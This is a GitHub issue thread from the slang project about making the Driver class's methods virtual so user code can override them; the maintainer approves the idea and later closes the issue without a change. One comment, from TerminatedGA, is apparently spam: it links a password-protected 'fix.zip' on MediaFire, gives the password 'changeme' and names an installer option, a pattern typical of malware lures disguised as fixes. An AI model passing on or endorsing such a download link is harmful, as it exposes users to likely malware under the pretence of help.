MikePopoloski/slang #1101: Make `Driver` customizable in user code

povik, 2024-08-26:
**Is your feature request related to a problem? Please describe.**
Make use of #1100 in a tool based on slang

**Describe the solution you'd like**
The `Driver::addParseOptions` method becomes virtual along with other `Driver` methods for which it may be useful to make them overridable 

**Describe alternatives you've considered**

 * not using `Driver` in user code (which means losing compatiblity with slang flags which is a loss)
 * duplicating the code implementing `Driver`

**Additional context**
I can make the necessary changes but I want the go-ahead.

TerminatedGA, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MikePopoloski, 2024-08-27:
Yes, that sounds fine to me. The Driver methods are basically only called once per compilation, so making them virtual doesn't seem like it would cost us anything.

MikePopoloski, 2024-10-20:
Going to close this out; this is still fine with me if you want to open a PR, but otherwise without an actual use case I won't make the change myself.

closed 2024-10-20 by MikePopoloski